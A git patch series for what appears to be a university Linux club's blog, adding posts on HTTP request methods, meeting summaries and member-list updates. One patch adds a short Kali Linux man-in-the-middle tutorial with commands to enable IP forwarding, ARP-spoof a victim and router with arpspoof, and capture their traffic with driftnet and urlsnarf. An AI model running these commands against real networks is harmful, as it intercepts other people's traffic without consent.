等方法是有可能产生副作用。网络爬虫等一般不会使用这些方式(笔者注:搜索引擎的暗网抓取可能会使用这些方法)。 +> 尽管GET方法是一般被视为“安全的”,但如果在实际使用中没有做任何设置,比如可以无限制的抓取等情况, 也会导致一些不可预料的问题,比如web缓存或者搜索引擎问题。 + +# POST + +POST一般用来上传文件或者提交一个完整的web表单。 + +这是Chrome中查看到的POST内容 +![Chrome中查看POST内容](http://ww1.sinaimg.cn/large/9f62afa1tw1ehfyundfwpj20bw03zt90.jpg) + +实际数据是这样的 + + user=554101&user_code=eNWyXdrrTpC6hoSvzPHBYKLljGkcDw79QsWtNeMu&attachment=0&code_brush=&code_snippet=&msg=test + +浏览器中提交表单时,这里与get类似,每个键值对都是通过`&`分割, 其他非字母数字会进行url转码。 + +**为什么一些请求会使用POST提交数据?** + ++ GET请求数据都可以在URL中看到 ++ GET提交的数据都会有长度限制 ++ 一般规范,POST用来修改数据,GET用来获取数据 ++ **GET请求请提交的数据放置在HTTP请求协议头中,而POST提交的数据则放在实体数据中** + +# 其他请求方式 + +## HEAD + +获取某个URI响应头信息,基本与GET相同但是不返回响应主体。 + +## PUT + +通过提供的URI获取到特定的内容主体,如果存在则修改内容,如果不存在则创建。 + +## DELETE + +通过URI删除指定内容 + +## TRACE + +返回接受到的请求,用来查看数据经过中间服务器时发生了哪些变动 + +## OPTIONS + +返回给定URL支持的所有HTTP方法 + +## CONNECT + +要求使用SSL和TLS进行TCP通信 + +## PATCH + +请求修改局部数据 + +# 参考链接 + ++ [http://en.wikipedia.org/wiki/POST_(HTTP)](http://en.wikipedia.org/wiki/POST\_\(HTTP\)) ++ [http://en.wikipedia.org/wiki/GET_(HTTP)](http://en.wikipedia.org/wiki/GET\_\(HTTP\)#Request_methods) From 59d82ecfcb1c751b73b1befb949d131b70103ab2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?lida=CC=8Ashua=CC=8Ang?= Date: Mon, 27 Oct 2014 22:55:05 +0800 Subject: [PATCH 12/22] Fixed --- ...2014-06-16-http-method-annotation.markdown | 31 ++++++++++--------- 1 file changed, 16 insertions(+), 15 deletions(-) diff --git a/_posts/2014-06-16-http-method-annotation.markdown b/_posts/2014-06-16-http-method-annotation.markdown index b0d8df91b..b65baa9fb 100644 --- a/_posts/2014-06-16-http-method-annotation.markdown +++ b/_posts/2014-06-16-http-method-annotation.markdown @@ -2,29 +2,30 @@ layout: post title: "HTTP请求方式注解" date: 2014-06-16 13:19 -comments: true -tags: Notes +disqus: y --- 被问到了HTTP常见的几个方法,也有些迷惑的地方,整理如下。 -# GET +## GET GET是http的默认请求方式, 一般用来获取数据, 传输的数据经过url编码后放在路径`?`之后, 多个键值对通过`&`连接, 另外get的传输长度一般不推荐超过255个字节。 -GET方法一般被视为安全方法, 因为它仅用来获取数据而不会对服务器有其他改动。 +GET方法一般被视为`安全方法`, 因为它仅用来获取数据而不会对服务器有其他改动。 > **安全方法** > 像HEAD、GET、OPTIONS 和 TRACE这几种http方法是被认为是“安全的”, 这意味着它们只会进行获取数据而不会修改服务器的状态, 换句话说,它们不会产生负面影响, 当然除了常见的无害操作,比如记录日志、创建缓存或者创建其他统计信息。 > 正相反, 像POST、PUT、DELETE 和 PATCH 等方法是有可能产生副作用。网络爬虫等一般不会使用这些方式(笔者注:搜索引擎的暗网抓取可能会使用这些方法)。 > 尽管GET方法是一般被视为“安全的”,但如果在实际使用中没有做任何设置,比如可以无限制的抓取等情况, 也会导致一些不可预料的问题,比如web缓存或者搜索引擎问题。 -# POST +## POST POST一般用来上传文件或者提交一个完整的web表单。 -这是Chrome中查看到的POST内容 +这是`Chrome`中查看到的`POST`内容: + + ![Chrome中查看POST内容](http://ww1.sinaimg.cn/large/9f62afa1tw1ehfyundfwpj20bw03zt90.jpg) 实际数据是这样的 @@ -40,37 +41,37 @@ POST一般用来上传文件或者提交一个完整的web表单。 + 一般规范,POST用来修改数据,GET用来获取数据 + **GET请求请提交的数据放置在HTTP请求协议头中,而POST提交的数据则放在实体数据中** -# 其他请求方式 +## 其他请求方式 -## HEAD +### HEAD 获取某个URI响应头信息,基本与GET相同但是不返回响应主体。 -## PUT +### PUT 通过提供的URI获取到特定的内容主体,如果存在则修改内容,如果不存在则创建。 -## DELETE +### DELETE 通过URI删除指定内容 -## TRACE +### TRACE 返回接受到的请求,用来查看数据经过中间服务器时发生了哪些变动 -## OPTIONS +### OPTIONS 返回给定URL支持的所有HTTP方法 -## CONNECT +### CONNECT 要求使用SSL和TLS进行TCP通信 -## PATCH +### PATCH 请求修改局部数据 -# 参考链接 +## 参考链接 + [http://en.wikipedia.org/wiki/POST_(HTTP)](http://en.wikipedia.org/wiki/POST\_\(HTTP\)) + [http://en.wikipedia.org/wiki/GET_(HTTP)](http://en.wikipedia.org/wiki/GET\_\(HTTP\)#Request_methods) From bfb400af5cef80518be63d02aeaffeb4f0080e49 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?lida=CC=8Ashua=CC=8Ang?= Date: Wed, 29 Oct 2014 00:06:34 +0800 Subject: [PATCH 13/22] :+1: --- ...2014-10-18-kali-linux-man-in-the-middle.md | 62 +++++++++++++++++++ 1 file changed, 62 insertions(+) create mode 100644 _posts/2014-10-18-kali-linux-man-in-the-middle.md diff --git a/_posts/2014-10-18-kali-linux-man-in-the-middle.md b/_posts/2014-10-18-kali-linux-man-in-the-middle.md new file mode 100644 index 000000000..24fd7001a --- /dev/null +++ b/_posts/2014-10-18-kali-linux-man-in-the-middle.md @@ -0,0 +1,62 @@ +--- +layout: post +title: Kali Linux Man in the Middle Attack +date: 2014-10-18 15:27:31 +disqus: y +--- + +> 使用的是kali linux 发行版 + +## 开启 Port Frowarding + +把` /proc/sys/net/ipv4/ip_forward` 的值从0改到1 + +``` +# echo '1' > /proc/sys/net/ipv4/ip_forward +``` + +开启 Port Forwrding 目的是我们机器类似路由的功能, 劫持数据包,处理后, 并转发出去 + +## 过程 + +被攻击者ip: `192.168.1.3` +攻击者ip: `192.168.1.9` +路由器ip: `192.168.1.1` +网卡是: `wlan0` + +### 0x1 + +在被攻击者和路由之间设置arp 欺骗 + +``` +# arpspoof -i wlan0 -t 192.168.1.3 192.168.1.1 +``` + +### 0x2 + +路由捕获的包转发给被攻击者 + +``` +# arpspoof -i wlan0 -t 192.168.1.1 192.168.1.3 +``` + +![arpspoof](http://lidashuang.u.qiniudn.com/2014-10-18%2021%3A49%3A19%E7%9A%84%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png) + +经过这两步,数据包就会经过我们的机器(192.168.1.9) + +可以使用`driftnet`这个工具抓取经过网卡的数据 + +``` +# driftnet -i wlan0 +``` + +效果: + +![driftnet](http://lidashuang.u.qiniudn.com/2014-10-18%2021%3A53%3A02%E7%9A%84%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png) + + +使用 `urlsnarf` 这个工具可以抓去被攻击者访问url + +``` +# urlsnarf -i wlan0 +``` From 9f802b84e488091ea8f9b2f0c79b87ba37530220 Mon Sep 17 00:00:00 2001 From: Magine Date: Fri, 31 Oct 2014 20:52:02 +0800 Subject: [PATCH 14/22] new exchange --- _posts/2014-10-31-exchange.markdown | 36 +++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 _posts/2014-10-31-exchange.markdown diff --git a/_posts/2014-10-31-exchange.markdown b/_posts/2014-10-31-exchange.markdown new file mode 100644 index 000000000..27d641feb --- /dev/null +++ b/_posts/2014-10-31-exchange.markdown @@ -0,0 +1,36 @@ +--- +layout: post +title: "2014/10/31技术交流(新人培训向)" +date: 2014-10-31 20:38 +disqus: y +--- + +## 交流内容 + ++ 刘伟 + + - 作品展示 小兜 + - Windows 下 Android 开发环境的配置 + ++ 王雷 + + - 老人幼儿GPS跟踪系统 + - 树莓派作品展示 + +![3](http://magine.qiniudn.com/2014-10-31 192853.jpg) + + ++ 谭贺贺 + + - 工具分享 autojump + - oh-my-zsh 的插件/主题配置与演示 + ++ 李敏成 + + - 写个脚本去扒图 + - 如何快速搭建Django站点 + +![2](http://magine.qiniudn.com/2014-10-31 192846.jpg) +![1](http://magine.qiniudn.com/2014-10-31 192843.jpg) + +Ps: Happy Halloween! From 082f296be1357a8716701f9353f1f765c3ed91be Mon Sep 17 00:00:00 2001 From: liuchunhui Date: Fri, 31 Oct 2014 21:38:30 +0800 Subject: [PATCH 15/22] =?UTF-8?q?=E6=9B=B4=E6=96=B0Member?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- members.md | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) diff --git a/members.md b/members.md index fcacff256..489ad5bb8 100644 --- a/members.md +++ b/members.md @@ -84,6 +84,15 @@ pythoner,热爱生活. * 博客: [自闭症患者,没有博客。]() +## 刘春辉 + +![hui](http://liuchunhui.qiniudn.com/e.jpg) + +* 计算机学院12级 + + +* 博客: [http://liuchunhui.github.io/) + ## 张睿提 ![zrt](http://sdut-zrt.qiniudn.com/IMG_2024.jpg) @@ -93,3 +102,14 @@ pythoner,热爱生活. * 博客: [http://imomi.info](http://imomi.info) + + +标签(空格分隔): 未分类 + +--- + +在此输入正文 + + + + From b434ca84c7ee5cdd87a7bb396c0bfb1fdb46be62 Mon Sep 17 00:00:00 2001 From: liuchunhui Date: Fri, 31 Oct 2014 21:43:03 +0800 Subject: [PATCH 16/22] =?UTF-8?q?=E6=9B=B4=E6=96=B0Member?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- members.md | 9 +--- members.md~ | 115 ++++++++++++++++++++++++++++++++++++++++++++++++++++ 2 files changed, 116 insertions(+), 8 deletions(-) create mode 100644 members.md~ diff --git a/members.md b/members.md index 489ad5bb8..fa9867e6a 100644 --- a/members.md +++ b/members.md @@ -91,7 +91,7 @@ pythoner,热爱生活. * 计算机学院12级 -* 博客: [http://liuchunhui.github.io/) +* 博客: [http://liuchunhui.github.io/](http://liuchunhui.github.io/) ## 张睿提 @@ -104,12 +104,5 @@ pythoner,热爱生活. -标签(空格分隔): 未分类 - ---- - -在此输入正文 - - diff --git a/members.md~ b/members.md~ new file mode 100644 index 000000000..489ad5bb8 --- /dev/null +++ b/members.md~ @@ -0,0 +1,115 @@ +--- +layout: page +title: Members +--- + +## 林寻 + +![linxun](http://pic.yupoo.com/lidashuang/C0rN1fbE/ySXk3.jpg) + +* 计算机学院07级 + + 关注web开发相关,关注LAMP, 现在在上海工作。 + +* 博客: [http://www.linxun.info](http://www.linxun.info) + +## 孙建希 + +![jianxi](http://pic.yupoo.com/ycsunjane/BUEXkBsM/medium.jpg) + +* 计算机学院08级 + +关注嵌入式linux,arm开发。 + +* 博客: [http://jianxi.info](http://jianxi.info) + + +## 李大双 + +![lidashuang](http://ww3.sinaimg.cn/bmiddle/7121be43jw1e5uc1ffmduj21kw0w0jti.jpg) + +* 计算机学院09级 + +程序员, 专业打杂, 熟悉xxx语言`HelloWorld` + +* 博客:[http://li.sdutlinux.org/](http://li.sdutlinux.org/) + + +##刘哲 + +![liuzhe](http://ww3.sinaimg.cn/bmiddle/7121be43jw1e57soe2ztvj21kw0w044p.jpg) + +* 计算机学院10级 + +喜欢linux, python +1 ,RoRing + +* 博客: [http://liuzhe0223.github.com](http://liuzhe0223.github.com) + +##马伟伟 + +![ma](http://ww3.sinaimg.cn/bmiddle/7121be43jw1e57si85200j21kw0w0ahc.jpg) + +* 计算机学院10级 + +喜欢linux, python, + +* 博客: [https://github.com/ma6174/blog/issues](https://github.com/ma6174/blog/issues?q=is:open+is:issue) + + +##张卫 + +![zhwei](http://ww3.sinaimg.cn/bmiddle/7121be43jw1e57sorc06wj21kw0w0n43.jpg) + +* 计算机学院11级 + +pythoner,热爱生活. + +* 博客: [http://zhangweide.cn](http://zhangweide.cn) + +## 汤奇峰 + +![tang](http://ww2.sinaimg.cn/bmiddle/7121be43jw1e7dyk51v4tj21kw16o12o.jpg) + +* 计算机学院11级 + + +* 博客: [http://xpaomian.com](http://xpaomian.com) + +## 李敏成 + +![magine](http://magine.qiniudn.com/psu.jpg) + +* 计算机学院12级 + + +* 博客: [自闭症患者,没有博客。]() + +## 刘春辉 + +![hui](http://liuchunhui.qiniudn.com/e.jpg) + +* 计算机学院12级 + + +* 博客: [http://liuchunhui.github.io/) + +## 张睿提 + +![zrt](http://sdut-zrt.qiniudn.com/IMG_2024.jpg) + +* 计算机学院13级 + + +* 博客: [http://imomi.info](http://imomi.info) + + + +标签(空格分隔): 未分类 + +--- + +在此输入正文 + + + + From d9a5f2f02758f1c0f6e11c1a82967d10198bb968 Mon Sep 17 00:00:00 2001 From: Magine Date: Sat, 1 Nov 2014 14:06:31 +0800 Subject: [PATCH 17/22] I have a blog! --- members.md | 2 +- members.md~ | 115 ---------------------------------------------------- 2 files changed, 1 insertion(+), 116 deletions(-) delete mode 100644 members.md~ diff --git a/members.md b/members.md index fa9867e6a..d7ea6e89c 100644 --- a/members.md +++ b/members.md @@ -82,7 +82,7 @@ pythoner,热爱生活. * 计算机学院12级 -* 博客: [自闭症患者,没有博客。]() +* 博客: [自闭症患者,但是有博客。](http://ma233.github.io/) ## 刘春辉 diff --git a/members.md~ b/members.md~ deleted file mode 100644 index 489ad5bb8..000000000 --- a/members.md~ +++ /dev/null @@ -1,115 +0,0 @@ ---- -layout: page -title: Members ---- - -## 林寻 - -![linxun](http://pic.yupoo.com/lidashuang/C0rN1fbE/ySXk3.jpg) - -* 计算机学院07级 - - 关注web开发相关,关注LAMP, 现在在上海工作。 - -* 博客: [http://www.linxun.info](http://www.linxun.info) - -## 孙建希 - -![jianxi](http://pic.yupoo.com/ycsunjane/BUEXkBsM/medium.jpg) - -* 计算机学院08级 - -关注嵌入式linux,arm开发。 - -* 博客: [http://jianxi.info](http://jianxi.info) - - -## 李大双 - -![lidashuang](http://ww3.sinaimg.cn/bmiddle/7121be43jw1e5uc1ffmduj21kw0w0jti.jpg) - -* 计算机学院09级 - -程序员, 专业打杂, 熟悉xxx语言`HelloWorld` - -* 博客:[http://li.sdutlinux.org/](http://li.sdutlinux.org/) - - -##刘哲 - -![liuzhe](http://ww3.sinaimg.cn/bmiddle/7121be43jw1e57soe2ztvj21kw0w044p.jpg) - -* 计算机学院10级 - -喜欢linux, python +1 ,RoRing - -* 博客: [http://liuzhe0223.github.com](http://liuzhe0223.github.com) - -##马伟伟 - -![ma](http://ww3.sinaimg.cn/bmiddle/7121be43jw1e57si85200j21kw0w0ahc.jpg) - -* 计算机学院10级 - -喜欢linux, python, - -* 博客: [https://github.com/ma6174/blog/issues](https://github.com/ma6174/blog/issues?q=is:open+is:issue) - - -##张卫 - -![zhwei](http://ww3.sinaimg.cn/bmiddle/7121be43jw1e57sorc06wj21kw0w0n43.jpg) - -* 计算机学院11级 - -pythoner,热爱生活. - -* 博客: [http://zhangweide.cn](http://zhangweide.cn) - -## 汤奇峰 - -![tang](http://ww2.sinaimg.cn/bmiddle/7121be43jw1e7dyk51v4tj21kw16o12o.jpg) - -* 计算机学院11级 - - -* 博客: [http://xpaomian.com](http://xpaomian.com) - -## 李敏成 - -![magine](http://magine.qiniudn.com/psu.jpg) - -* 计算机学院12级 - - -* 博客: [自闭症患者,没有博客。]() - -## 刘春辉 - -![hui](http://liuchunhui.qiniudn.com/e.jpg) - -* 计算机学院12级 - - -* 博客: [http://liuchunhui.github.io/) - -## 张睿提 - -![zrt](http://sdut-zrt.qiniudn.com/IMG_2024.jpg) - -* 计算机学院13级 - - -* 博客: [http://imomi.info](http://imomi.info) - - - -标签(空格分隔): 未分类 - ---- - -在此输入正文 - - - - From 866c4e024c42b5181cdae02a8f3d499bc6d51f73 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=A5=C3=A5?= Date: Sat, 1 Nov 2014 14:15:42 +0800 Subject: [PATCH 18/22] Update members.md --- members.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/members.md b/members.md index d7ea6e89c..0ff098b86 100644 --- a/members.md +++ b/members.md @@ -32,7 +32,7 @@ title: Members 程序员, 专业打杂, 熟悉xxx语言`HelloWorld` -* 博客:[http://li.sdutlinux.org/](http://li.sdutlinux.org/) +* 博客:[sf.gg/lds](http://segmentfault.com/blog/lds) ##刘哲 From ff4dc66decada5a20e039ebf1cc00125ad64d2a4 Mon Sep 17 00:00:00 2001 From: nplus Date: Sat, 23 May 2015 08:50:53 +0800 Subject: [PATCH 19/22] update jun --- members.md | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/members.md b/members.md index 0ff098b86..1d1f2e40d 100644 --- a/members.md +++ b/members.md @@ -102,7 +102,14 @@ pythoner,热爱生活. * 博客: [http://imomi.info](http://imomi.info) +## 叶思俊 +![nplus](http://7xj3s8.com1.z0.glb.clouddn.com/JUN.jpg) + +* 材料学院13级 + + +* 博客: [http://nplus.xyz](http://nplus.xyz) From f8c0ff51c3f528cad29dc68db87fb05e2d7d23ef Mon Sep 17 00:00:00 2001 From: nplus Date: Sat, 23 May 2015 19:32:31 +0800 Subject: [PATCH 20/22] update group meet of exchange 2015--5-21 --- _posts/2015-05-21-exchange.markdown | 48 +++++++++++++++++++++++++++++ 1 file changed, 48 insertions(+) create mode 100644 _posts/2015-05-21-exchange.markdown diff --git a/_posts/2015-05-21-exchange.markdown b/_posts/2015-05-21-exchange.markdown new file mode 100644 index 000000000..54168ff43 --- /dev/null +++ b/_posts/2015-05-21-exchange.markdown @@ -0,0 +1,48 @@ +--- +layout: post +title: "2015/05/21技术交流" +date: 2015-05-21 20:38 +disqus: y +--- + +## 交流内容 + +### 张志友 + + + java web开发三大框架之sping介绍 + + - Linux PATH路径问题 + +![1](http://7xj3s8.com1.z0.glb.clouddn.com/slugIMG_0264.JPG) +![2](http://7xj3s8.com1.z0.glb.clouddn.com/slugIMG_0266.JPG) + +### 叶思俊 + + + Docker 介绍及入门操作 + +![3](http://7xj3s8.com1.z0.glb.clouddn.com/slugDocker.png) + +### 何艳红 + + + [WORDPRESS密码算法规则及忘记密码解决方案](http://ttop5.net/?p=874) + +![4](http://7xj3s8.com1.z0.glb.clouddn.com/slugIMG_0269.JPG) + +### 彭呈凯 + + + java web开发框架之struts2介绍 + + jsp select 两种联动框 + +![5](http://7xj3s8.com1.z0.glb.clouddn.com/slugIMG_0271.JPG) +![6](http://7xj3s8.com1.z0.glb.clouddn.com/slugIMG_0273.JPG) + +### 董炳蔚 + + + Bootstrap 介绍 + - bootstap 的栅格系统入门 + + 介绍常见的前台框架和bootstap案例 + +![7](http://7xj3s8.com1.z0.glb.clouddn.com/slugIMG_0279.JPG) +![8](http://7xj3s8.com1.z0.glb.clouddn.com/slugIMG_0280.JPG) + +Ps: 第一次在信息楼java组开交流会 From 6be0af2a2fe65040e72812d96ed179daf38f7290 Mon Sep 17 00:00:00 2001 From: nplus Date: Sat, 23 May 2015 21:23:31 +0800 Subject: [PATCH 21/22] udpate 2015/05/21 exchange --- _posts/2015-05-21-exchange.markdown | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/_posts/2015-05-21-exchange.markdown b/_posts/2015-05-21-exchange.markdown index 54168ff43..b566e3914 100644 --- a/_posts/2015-05-21-exchange.markdown +++ b/_posts/2015-05-21-exchange.markdown @@ -10,7 +10,7 @@ disqus: y ### 张志友 + java web开发三大框架之sping介绍 - + - maven配合spring开发 - Linux PATH路径问题 ![1](http://7xj3s8.com1.z0.glb.clouddn.com/slugIMG_0264.JPG) From 63566c812b86ece6659fc51db2ddcddf79c0bf5a Mon Sep 17 00:00:00 2001 From: lvhuiyang Date: Thu, 26 May 2016 19:23:14 +0000 Subject: [PATCH 22/22] 2016-5-22meeting --- _posts/2016-05-22-exchange.markdown | 45 +++++++++++++++++++++++++++++ members.md | 6 ++++ 2 files changed, 51 insertions(+) create mode 100644 _posts/2016-05-22-exchange.markdown diff --git a/_posts/2016-05-22-exchange.markdown b/_posts/2016-05-22-exchange.markdown new file mode 100644 index 000000000..a4fc4f1ef --- /dev/null +++ b/_posts/2016-05-22-exchange.markdown @@ -0,0 +1,45 @@ +--- +layout: post +title: "2016/05/22技术交流" +date: 2016-05-22 19:00 +disqus: y +--- + +## 交流内容 + +### 先放一张全体照 + +![1](http://o6om1eg3i.bkt.clouddn.com/DSC00204.jpg) + +### 吕绘杨 + + + requests + flask 实现正方教务系统的模拟登录 + +![2](http://o6om1eg3i.bkt.clouddn.com/DSC00206.jpg) + +### 叶思俊 + + + OAuth2.0的机制原理讲解 + +![3](http://o6om1eg3i.bkt.clouddn.com/DSC00213.jpg) + +### 李敏成 + + + chrome F12的应用 + + 提出问题与解答疑问 + +![4](http://o6om1eg3i.bkt.clouddn.com/DSC00215.jpg) + +### 陈海波 + + + docker介绍与daocloud的应用 + +![5](http://o6om1eg3i.bkt.clouddn.com/DSC00217.jpg) + +### 闫子璐 + + + 分享面试经验与解答疑问 + +![6](http://o6om1eg3i.bkt.clouddn.com/DSC00221.jpg) + +Ps: 大一大二大三大四成员都在,人比较全的一次会议 diff --git a/members.md b/members.md index 1d1f2e40d..7266fa2ca 100644 --- a/members.md +++ b/members.md @@ -112,4 +112,10 @@ pythoner,热爱生活. * 博客: [http://nplus.xyz](http://nplus.xyz) +## 吕绘杨 +![huiyang233](http://o6om1eg3i.bkt.clouddn.com/WIN_20160526_15_10_06_Pro.jpg) + +* 计算机学院14级 + +* 博客:[http://blog.lvhuiyang.cn](http://blog.lvhuiyang.cn)